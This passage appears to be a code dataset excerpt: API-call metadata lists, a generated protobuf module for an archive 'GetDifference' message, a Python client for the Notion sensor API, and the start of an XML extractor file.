'(lam)\n', (4148, 4153), True, 'import numpy as np\n'), ((4863, 4874), 'tensorflow.shape', 'tf.shape', (['F'], {}), '(F)\n', (4871, 4874), True, 'import tensorflow as tf\n'), ((4918, 4940), 'tensorflow.constant', 'tf.constant', (['[0, 1, 1]'], {}), '([0, 1, 1])\n', (4929, 4940), True, 'import tensorflow as tf\n'), ((5347, 
5363), 'tensorflow.linalg.det', 'tf.linalg.det', (['C'], {}), '(C)\n', (5360, 5363), True, 'import tensorflow as tf\n'), ((6579, 6610), 'tensorflow.transpose', 'tf.transpose', (['F'], {'perm': '[0, 2, 1]'}), '(F, perm=[0, 2, 1])\n', (6591, 6610), True, 'import tensorflow as tf\n'), ((6630, 6669), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['lagMul', '(2)'], {}), '(lagMul, 2)\n', (6658, 6669), True, 'import tensorflow as tf\n'), ((6670, 6692), 'tensorflow.constant', 'tf.constant', (['[1, 3, 3]'], {}), '([1, 3, 3])\n', (6681, 6692), True, 'import tensorflow as tf\n'), ((6881, 6897), 'tensorflow.linalg.inv', 'tf.linalg.inv', (['F'], {}), '(F)\n', (6894, 6897), True, 'import tensorflow as tf\n'), ((7058, 7080), 'tensorflow.constant', 'tf.constant', (['[1, 3, 3]'], {}), '([1, 3, 3])\n', (7069, 7080), True, 'import tensorflow as tf\n'), ((7907, 7954), 'keras.layers.Input', 'k.layers.Input', ([], {'shape': '(numExtra,)', 'name': '"""extra"""'}), "(shape=(numExtra,), name='extra')\n", (7921, 7954), True, 'import keras as k\n'), ((2188, 2199), 'tensorflow.shape', 'tf.shape', (['w'], {}), '(w)\n', (2196, 2199), True, 'import tensorflow as tf\n'), ((2281, 2306), 'tensorflow.constant', 'tf.constant', (['[0, 1, 1, 1]'], {}), '([0, 1, 1, 1])\n', (2292, 2306), True, 'import tensorflow as tf\n'), ((2437, 2464), 'tensorflow.concat', 'tf.concat', (['[L_0, L]'], {'axis': '(1)'}), '([L_0, L], axis=1)\n', (2446, 2464), True, 'import tensorflow as tf\n'), ((2574, 2602), 'tensorflow.constant', 'tf.constant', (['[1, 0, 1, 1, 1]'], {}), '([1, 0, 1, 1, 1])\n', (2585, 2602), True, 'import tensorflow as tf\n'), ((2613, 2647), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['L', '(1)'], {}), '(L, 1)\n', (2641, 2647), True, 'import tensorflow as tf\n'), ((2719, 2753), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['w', '(3)'], {}), '(w, 3)\n', (2747, 2753), True, 'import tensorflow as tf\n'), ((2813, 2847), 
'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['w', '(4)'], {}), '(w, 4)\n', (2841, 2847), True, 'import tensorflow as tf\n'), ((3171, 3205), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['C', '(1)'], {}), '(C, 1)\n', (3199, 3205), True, 'import tensorflow as tf\n'), ((3241, 3261), 'tensorflow.matmul', 'tf.matmul', (['C_tile', 'H'], {}), '(C_tile, H)\n', (3250, 3261), True, 'import tensorflow as tf\n'), ((3418, 3452), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['C', '(1)'], {}), '(C, 1)\n', (3446, 3452), True, 'import tensorflow as tf\n'), ((3555, 3597), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['detC_tile', '(2)'], {}), '(detC_tile, 2)\n', (3583, 3597), True, 'import tensorflow as tf\n'), ((3663, 3705), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['detC_tile', '(3)'], {}), '(detC_tile, 3)\n', (3691, 3705), True, 'import tensorflow as tf\n'), ((3746, 3785), 'tensorflow.transpose', 'tf.transpose', (['C_tile'], {'perm': '[0, 1, 3, 2]'}), '(C_tile, perm=[0, 1, 3, 2])\n', (3758, 3785), True, 'import tensorflow as tf\n'), ((4895, 4917), 'tensorflow.constant', 'tf.constant', (['[1, 0, 0]'], {}), '([1, 0, 0])\n', (4906, 4917), True, 'import tensorflow as tf\n'), ((4989, 4998), 'tensorflow.eye', 'tf.eye', (['(3)'], {}), '(3)\n', (4995, 4998), True, 'import tensorflow as tf\n'), ((5952, 5974), 'numpy.arccos', 'np.arccos', (['(nom / denom)'], {}), '(nom / denom)\n', (5961, 5974), True, 'import numpy as np\n'), ((7032, 7054), 'tensorflow.math.divide', 'tf.math.divide', (['(1.0)', 'J'], {}), '(1.0, J)\n', (7046, 7054), True, 'import tensorflow as tf\n'), ((7128, 7159), 'tensorflow.transpose', 'tf.transpose', (['F'], {'perm': '[0, 2, 1]'}), '(F, perm=[0, 2, 1])\n', (7140, 7159), True, 'import tensorflow as tf\n'), ((11662, 11853), 'keras.layers.Lambda', 'k.layers.Lambda', (['(lambda x: c10 * (x[0] - 3.0) + c20 * (x[0] - 3.0) ** 2 + 
c30 * (x[0] - 3.0\n ) ** 3 + c01 * (x[1] - 3.0) + c02 * (x[1] - 3.0) ** 2 + c03 * (x[1] - \n 3.0) ** 3)'], {'name': '"""Psi"""'}), "(lambda x: c10 * (x[0] - 3.0) + c20 * (x[0] - 3.0) ** 2 + \n c30 * (x[0] - 3.0) ** 3 + c01 * (x[1] - 3.0) + c02 * (x[1] - 3.0) ** 2 +\n c03 * (x[1] - 3.0) ** 3, name='Psi')\n", (11677, 11853), True, 'import keras as k\n'), ((11958, 12013), 'keras.layers.Lambda', 'k.layers.Lambda', (['(lambda x: c * (x[0] - 3.0))'], {'name': '"""Psi"""'}), "(lambda x: c * (x[0] - 3.0), name='Psi')\n", (11973, 12013), True, 'import keras as k\n'), ((12157, 12233), 'keras.layers.Lambda', 'k.layers.Lambda', (['(lambda x: c1 * (x[0] - 3.0) + c2 * (x[1] - 3.0))'], {'name': '"""Psi"""'}), "(lambda x: c1 * (x[0] - 3.0) + c2 * (x[1] - 3.0), name='Psi')\n", (12172, 12233), True, 'import keras as k\n'), ((2256, 2281), 'tensorflow.constant', 'tf.constant', (['[1, 0, 0, 0]'], {}), '([1, 0, 0, 0])\n', (2267, 2281), True, 'import tensorflow as tf\n'), ((2547, 2575), 'tensorflow.constant', 'tf.constant', (['[0, 1, 0, 0, 0]'], {}), '([0, 1, 0, 0, 0])\n', (2558, 2575), True, 'import tensorflow as tf\n'), ((10328, 10371), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['P[:, 0, 0]', '(1)'], {}), '(P[:, 0, 0], 1)\n', (10356, 10371), True, 'import tensorflow as tf\n'), ((10980, 11023), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['P[:, 0, 0]', '(1)'], {}), '(P[:, 0, 0], 1)\n', (11008, 11023), True, 'import tensorflow as tf\n'), ((5801, 5816), 'numpy.power', 'np.power', (['I1', '(2)'], {}), '(I1, 2)\n', (5809, 5816), True, 'import numpy as np\n'), ((8239, 8250), 'tensorflow.shape', 'tf.shape', (['F'], {}), '(F)\n', (8247, 8250), True, 'import tensorflow as tf\n'), ((10797, 10813), 'tensorflow.linalg.det', 'tf.linalg.det', (['F'], {}), '(F)\n', (10810, 10813), True, 'import tensorflow as tf\n'), ((2388, 2397), 'tensorflow.eye', 'tf.eye', (['(3)'], {}), '(3)\n', (2394, 2397), True, 'import tensorflow as tf\n'), ((5843, 
5858), 'numpy.power', 'np.power', (['I1', '(3)'], {}), '(I1, 3)\n', (5851, 5858), True, 'import numpy as np\n'), ((5863, 5882), 'numpy.multiply', 'np.multiply', (['I1', 'I2'], {}), '(I1, I2)\n', (5874, 5882), True, 'import numpy as np\n'), ((5914, 5929), 'numpy.power', 'np.power', (['I1', '(2)'], {}), '(I1, 2)\n', (5922, 5929), True, 'import numpy as np\n'), ((6052, 6097), 'numpy.cos', 'np.cos', (['((theta + 2 * np.pi * (k - 1.0)) / 3.0)'], {}), '((theta + 2 * np.pi * (k - 1.0)) / 3.0)\n', (6058, 6097), True, 'import numpy as np\n'), ((6194, 6223), 'numpy.cos', 'np.cos', (['(2.0 / 3.0 * np.pi * k)'], {}), '(2.0 / 3.0 * np.pi * k)\n', (6200, 6223), True, 'import numpy as np\n'), ((6225, 6254), 'numpy.sin', 'np.sin', (['(2.0 / 3.0 * np.pi * k)'], {}), '(2.0 / 3.0 * np.pi * k)\n', (6231, 6254), True, 'import numpy as np\n'), ((6168, 6183), 'numpy.power', 'np.power', (['I1', '(3)'], {}), '(I1, 3)\n', (6176, 6183), True, 'import numpy as np\n'), ((6030, 6045), 'numpy.power', 'np.power', (['I1', '(2)'], {}), '(I1, 2)\n', (6038, 6045), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: get_difference.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from file_repository_sdk.model.file_repository import diff_pb2 as file__repository__sdk_dot_model_dot_file__repository_dot_diff__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='get_difference.proto',
package='archive',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x14get_difference.proto\x12\x07\x61rchive\x1a\x34\x66ile_repository_sdk/model/file_repository/diff.proto\"~\n\x14GetDifferenceRequest\x12\x10\n\x08ver_from\x18\x01 \x01(\t\x12\x0e\n\x06ver_to\x18\x02 \x01(\t\x12\x11\n\tdiff_file\x18\x03 \x01(\t\x12\x0c\n\x04path\x18\x04 \x01(\t\x12\x10\n\x08\x65ncoding\x18\x05 \x01(\t\x12\x11\n\tpackageId\x18\x06 \x01(\t\"u\n\x1cGetDifferenceResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12#\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x15.file_repository.Diffb\x06proto3')
,
dependencies=[file__repository__sdk_dot_model_dot_file__repository_dot_diff__pb2.DESCRIPTOR,])
_GETDIFFERENCEREQUEST = _descriptor.Descriptor(
name='GetDifferenceRequest',
full_name='archive.GetDifferenceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ver_from', full_name='archive.GetDifferenceRequest.ver_from', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ver_to', full_name='archive.GetDifferenceRequest.ver_to', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='diff_file', full_name='archive.GetDifferenceRequest.diff_file', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='archive.GetDifferenceRequest.path', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='encoding', full_name='archive.GetDifferenceRequest.encoding', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='archive.GetDifferenceRequest.packageId', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=87,
serialized_end=213,
)
_GETDIFFERENCERESPONSEWRAPPER = _descriptor.Descriptor(
name='GetDifferenceResponseWrapper',
full_name='archive.GetDifferenceResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='archive.GetDifferenceResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='archive.GetDifferenceResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='archive.GetDifferenceResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='archive.GetDifferenceResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=215,
serialized_end=332,
)
_GETDIFFERENCERESPONSEWRAPPER.fields_by_name['data'].message_type = file__repository__sdk_dot_model_dot_file__repository_dot_diff__pb2._DIFF
DESCRIPTOR.message_types_by_name['GetDifferenceRequest'] = _GETDIFFERENCEREQUEST
DESCRIPTOR.message_types_by_name['GetDifferenceResponseWrapper'] = _GETDIFFERENCERESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetDifferenceRequest = _reflection.GeneratedProtocolMessageType('GetDifferenceRequest', (_message.Message,), {
'DESCRIPTOR' : _GETDIFFERENCEREQUEST,
'__module__' : 'get_difference_pb2'
# @@protoc_insertion_point(class_scope:archive.GetDifferenceRequest)
})
_sym_db.RegisterMessage(GetDifferenceRequest)
GetDifferenceResponseWrapper = _reflection.GeneratedProtocolMessageType('GetDifferenceResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _GETDIFFERENCERESPONSEWRAPPER,
'__module__' : 'get_difference_pb2'
# @@protoc_insertion_point(class_scope:archive.GetDifferenceResponseWrapper)
})
_sym_db.RegisterMessage(GetDifferenceResponseWrapper)
# @@protoc_insertion_point(module_scope)
| [
"google.protobuf.reflection.GeneratedProtocolMessageType",
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor"
] | [((468, 494), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (492, 494), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((6604, 6773), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetDifferenceRequest"""', '(_message.Message,)', "{'DESCRIPTOR': _GETDIFFERENCEREQUEST, '__module__': 'get_difference_pb2'}"], {}), "('GetDifferenceRequest', (_message.\n Message,), {'DESCRIPTOR': _GETDIFFERENCEREQUEST, '__module__':\n 'get_difference_pb2'})\n", (6644, 6773), True, 'from google.protobuf import reflection as _reflection\n'), ((6924, 7109), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetDifferenceResponseWrapper"""', '(_message.Message,)', "{'DESCRIPTOR': _GETDIFFERENCERESPONSEWRAPPER, '__module__':\n 'get_difference_pb2'}"], {}), "('GetDifferenceResponseWrapper', (\n _message.Message,), {'DESCRIPTOR': _GETDIFFERENCERESPONSEWRAPPER,\n '__module__': 'get_difference_pb2'})\n", (6964, 7109), True, 'from google.protobuf import reflection as _reflection\n'), ((4462, 4806), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""code"""', 'full_name': '"""archive.GetDifferenceResponseWrapper.code"""', 'index': '(0)', 'number': '(1)', 'type': '(5)', 'cpp_type': '(1)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='code', full_name=\n 'archive.GetDifferenceResponseWrapper.code', index=0, number=1, type=5,\n cpp_type=1, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (4489, 4806), 
True, 'from google.protobuf import descriptor as _descriptor\n'), ((5627, 5976), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""data"""', 'full_name': '"""archive.GetDifferenceResponseWrapper.data"""', 'index': '(3)', 'number': '(4)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='data', full_name=\n 'archive.GetDifferenceResponseWrapper.data', index=3, number=4, type=11,\n cpp_type=10, label=1, has_default_value=False, default_value=None,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (5654, 5976), True, 'from google.protobuf import descriptor as _descriptor\n')] |
import requests
import json
from string import Template
from models.user import User
from models.task import Task
from models.system import System
from models.threshold import Threshold
from models.user_preferences import UserPreferences
from models.alert_perferences import AlertPerferences
from models.base_station import BaseStation
from models.devices import Device
from models.event import Event
from models.location import Location
from models.sensor import Sensor
from models.task_data import TaskData
BASE_URL = "https://api.getnotion.com/api/"
HEADERS = {'content-type': 'application/json'}
AUTH_HEADER = '{"Authorization": "Token token=${token}"}'
class PyNotion:
def __init__(self):
self.r = requests
self.auth_token = None
def get_token(self, user_name, password):
"""
Opens a new session
:param user_name:
:param password:
:return: a user object
"""
url = "{0}users/sign_in".format(BASE_URL)
t = Template('{"sessions": {"email": "${email}", "password": "${password}"}}')
data = t.substitute(email=user_name, password=password)
results = self.r.post(url, data=data, headers=HEADERS)
if results.status_code == 200:
return User(**results.json()['users'])
return results.json()
def kill_token(self):
"""
:return: bool to indication success or failure
"""
url = "{0}users/sign_out".format(BASE_URL)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_my_info(self, user_id):
"""
:return: user object
"""
url = "{}/users/{}".format(BASE_URL, user_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return User(**results['users'])
def delete_user(self, user_id):
url = "{}/users/{}".format(BASE_URL, user_id)
results = self.r.get(url, headers=self._get_auth_header())
return results.status_code == 204
def get_sensors(self):
"""
:return: list of sensors
"""
url = "{}/sensors/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
sensors = []
for sensor in results['sensors']:
sensors.append(Sensor(**sensor))
return sensors
def get_tasks(self):
"""
:return: list of tasks
"""
url = "{}/tasks/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
tasks = []
for task in results['tasks']:
tasks.append(Task(**task))
return tasks
def get_task(self, task_id):
"""
:param task_id:
:return: task object
"""
url = "{}/tasks/{}/".format(BASE_URL, task_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Task(**results['tasks'])
def delete_task(self, task_id):
"""
:param task_id:
:return: Boolean
"""
url = "{}/tasks/{}/".format(BASE_URL, task_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_task_data(self, task_id, data_before, data_after):
# ToDo - Figure out parameters
"""
:param: data_before 2017-01-01T12:00:00.000Z
:param: data_after 2017-01-01T12:00:00.000Z
:param: task_id
:return: task data
"""
url = "{}/tasks/{}/data/?data_before={}&data_after={}".format(BASE_URL, task_id, data_before, data_after)
header = self._get_auth_header()
results = self.r.get(url, headers=header)
try:
return TaskData(**results.json()['task'])
except KeyError as e:
print("Unable to retrieve task data Date format should be '2017-01-01T12:00:00.000Z'.")
def get_systems(self):
"""
:return: list of systems
"""
url = "{}/systems/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
systems = []
for system in results['systems']:
systems.append(System(**system))
return systems
def get_system(self, system_id):
"""
:param system_id:
:return: system details
"""
url = "{}/systems/{}/".format(BASE_URL, system_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return System(**results['systems'])
def delete_system(self, system_id):
"""
:return: Boolean
"""
url = "{}/systems/{}/".format(BASE_URL, system_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_thresholds(self):
"""
:return: list of thresholds
"""
# ToDo - Create/Update Threshold Class
raise NotImplementedError
url = "{}/thresholds/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
thresholds = []
for threshold in results['thresholds']:
thresholds.append(Threshold(**threshold))
return thresholds
def get_threshold(self, threshold_id):
"""
:param threshold_id:
:return: threshold details
"""
raise NotImplementedError
url = "{}/thresholds/{}/".format(BASE_URL, threshold_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Threshold(**results['thresholds'])
def delete_threshold(self, threshold_id):
"""
:param threshold_id:
:return: Boolean
"""
url = "{}/thresholds/{}/".format(BASE_URL, threshold_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_user_preferences(self, user_id):
"""
:return: user preference details
"""
url = "{}/users/{}/user_preferences/".format(BASE_URL, user_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return UserPreferences(**results['user_preferences'])
def get_alert_preferences(self, task_id):
"""
:param task_id:
:return: list of alert_preferences
"""
url = "{}/tasks/{}/alert_preferences".format(BASE_URL, task_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
alert_preferences = []
for alert in results['alert_preferences']:
alert_preferences.append(AlertPerferences(**alert))
return alert_preferences
def get_alert_preference(self, task_id, preference_id):
"""
:param task_id:
:param preference_id:
:return: alert_preference details
"""
url = "{}/tasks/{}/alert_preferences/{}/".format(BASE_URL, task_id, preference_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return AlertPerferences(**results['alert_preferences'])
def delete_alert_preference(self, task_id, preference_id):
"""
:param task_id:
:param preference_id:
:return: Boolean
"""
url = "{}/tasks/{}/alert_preferences/{}/".format(BASE_URL, task_id, preference_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_bridges(self):
"""
:return: list of bridges
"""
url = "{}/base_stations/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
base_stations = []
for base_station in results['base_stations']:
base_stations.append(BaseStation(**base_station))
return base_stations
def get_bridge(self, bridge_id):
"""
:param bridge_id:
:return: bridge details
"""
if bridge_id is None:
return "Bridge ID is a required parameter"
url = "{}/base_stations/{}/".format(BASE_URL, bridge_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return BaseStation(**results['base_stations'])
def delete_bridge(self, bridge_id):
"""
:param bridge_id:
:return: Boolean
"""
if bridge_id is None:
return "Bridge ID is a required parameter"
url = "{}/base_stations/{}/".format(BASE_URL, bridge_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_devices(self):
"""
:return: list of devices
"""
url = "{}/devices/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
devices = []
for device in results['devices']:
devices.append(Device(**device))
return devices
def get_device(self, device_id):
"""
:return: list of devices
"""
if device_id is None:
return "Device Id is a required parameter"
url = "{}/devices/{}".format(BASE_URL, device_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Device(**results['devices'])
def delete_device(self, device_id):
"""
:param device_id
:return: Boolean
"""
if device_id is None:
return "Device Id is a required parameter"
url = "{}/devices/{}".format(BASE_URL, device_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_events(self):
"""
:return: list of events
"""
# ToDo - Create Event Object
raise NotImplementedError
url = "{}/events/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
events = []
for event in results['events']:
events.append(Event(**event))
return events
def get_event(self, event_id):
"""
:param event_id:
:return: event details
"""
# ToDo - Create Event Object
raise NotImplementedError
if event_id is None:
return "Event ID is a required parameter"
url = "{}/events/{}/".format(BASE_URL, event_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Event(**results['events'])
def get_locations(self, system_id):
"""
:param system_id
:return: list of locations
"""
url = "{}/systems/{}/locations/".format(BASE_URL, system_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
locations = []
for location in results['locations']:
locations.append(Location(**location))
return locations
def get_location(self, location_id, system_id):
"""
:param system_id
:param location_id
:return: location object
"""
url = "{}/systems/{}/locations/{}/".format(BASE_URL, system_id, location_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Location(**results['locations'])
def delete_location(self, location_id, system_id):
"""
:param system_id
:param location_id
:return: Boolean
"""
url = "{}/systems/{}/locations/{}/".format(BASE_URL, system_id, location_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
    def _get_auth_header(self):
        """Build the HTTP auth header dict from the stored token.

        :return: dict parsed from the AUTH_HEADER template with the token
                 substituted in
        """
        t = Template(AUTH_HEADER)
        if self.auth_token is None:
            # NOTE(review): printing and killing the whole process from a
            # library helper is surprising; raising an exception would let
            # callers recover -- confirm before changing.
            print("Please set PyNotion.token\np = PyNotion()\np.token = '<<token here>>'")
            exit(1)
        return json.loads(t.substitute(token=self.auth_token))
| [
"models.alert_perferences.AlertPerferences",
"models.location.Location",
"models.devices.Device",
"models.user.User",
"string.Template",
"models.threshold.Threshold",
"models.sensor.Sensor",
"models.task.Task",
"models.system.System",
"models.base_station.BaseStation",
"models.user_preferences.U... | [((1003, 1077), 'string.Template', 'Template', (['"""{"sessions": {"email": "${email}", "password": "${password}"}}"""'], {}), '(\'{"sessions": {"email": "${email}", "password": "${password}"}}\')\n', (1011, 1077), False, 'from string import Template\n'), ((1827, 1851), 'models.user.User', 'User', ([], {}), "(**results['users'])\n", (1831, 1851), False, 'from models.user import User\n'), ((2959, 2983), 'models.task.Task', 'Task', ([], {}), "(**results['tasks'])\n", (2963, 2983), False, 'from models.task import Task\n'), ((4550, 4578), 'models.system.System', 'System', ([], {}), "(**results['systems'])\n", (4556, 4578), False, 'from models.system import System\n'), ((5606, 5640), 'models.threshold.Threshold', 'Threshold', ([], {}), "(**results['thresholds'])\n", (5615, 5640), False, 'from models.threshold import Threshold\n'), ((6215, 6261), 'models.user_preferences.UserPreferences', 'UserPreferences', ([], {}), "(**results['user_preferences'])\n", (6230, 6261), False, 'from models.user_preferences import UserPreferences\n'), ((7086, 7134), 'models.alert_perferences.AlertPerferences', 'AlertPerferences', ([], {}), "(**results['alert_preferences'])\n", (7102, 7134), False, 'from models.alert_perferences import AlertPerferences\n'), ((8246, 8285), 'models.base_station.BaseStation', 'BaseStation', ([], {}), "(**results['base_stations'])\n", (8257, 8285), False, 'from models.base_station import BaseStation\n'), ((9326, 9354), 'models.devices.Device', 'Device', ([], {}), "(**results['devices'])\n", (9332, 9354), False, 'from models.devices import Device\n'), ((10537, 10563), 'models.event.Event', 'Event', ([], {}), "(**results['events'])\n", (10542, 10563), False, 'from models.event import Event\n'), ((11313, 11345), 'models.location.Location', 'Location', ([], {}), "(**results['locations'])\n", (11321, 11345), False, 'from models.location import Location\n'), ((11745, 11766), 'string.Template', 'Template', (['AUTH_HEADER'], {}), 
'(AUTH_HEADER)\n', (11753, 11766), False, 'from string import Template\n'), ((2347, 2363), 'models.sensor.Sensor', 'Sensor', ([], {}), '(**sensor)\n', (2353, 2363), False, 'from models.sensor import Sensor\n'), ((2669, 2681), 'models.task.Task', 'Task', ([], {}), '(**task)\n', (2673, 2681), False, 'from models.task import Task\n'), ((4241, 4257), 'models.system.System', 'System', ([], {}), '(**system)\n', (4247, 4257), False, 'from models.system import System\n'), ((5236, 5258), 'models.threshold.Threshold', 'Threshold', ([], {}), '(**threshold)\n', (5245, 5258), False, 'from models.threshold import Threshold\n'), ((6665, 6690), 'models.alert_perferences.AlertPerferences', 'AlertPerferences', ([], {}), '(**alert)\n', (6681, 6690), False, 'from models.alert_perferences import AlertPerferences\n'), ((7829, 7856), 'models.base_station.BaseStation', 'BaseStation', ([], {}), '(**base_station)\n', (7840, 7856), False, 'from models.base_station import BaseStation\n'), ((8958, 8974), 'models.devices.Device', 'Device', ([], {}), '(**device)\n', (8964, 8974), False, 'from models.devices import Device\n'), ((10083, 10097), 'models.event.Event', 'Event', ([], {}), '(**event)\n', (10088, 10097), False, 'from models.event import Event\n'), ((10930, 10950), 'models.location.Location', 'Location', ([], {}), '(**location)\n', (10938, 10950), False, 'from models.location import Location\n')] |
from extraction.runnables import Extractor, RunnableError, ExtractorResult
import extractor.csxextract.interfaces as interfaces
import extractor.csxextract.config as config
import extractor.csxextract.filters as filters
import defusedxml.ElementTree as safeET
import xml.etree.ElementTree as ET
import xml.sax.saxutils as xmlutils
import extraction.utils
import tempfile
import requests
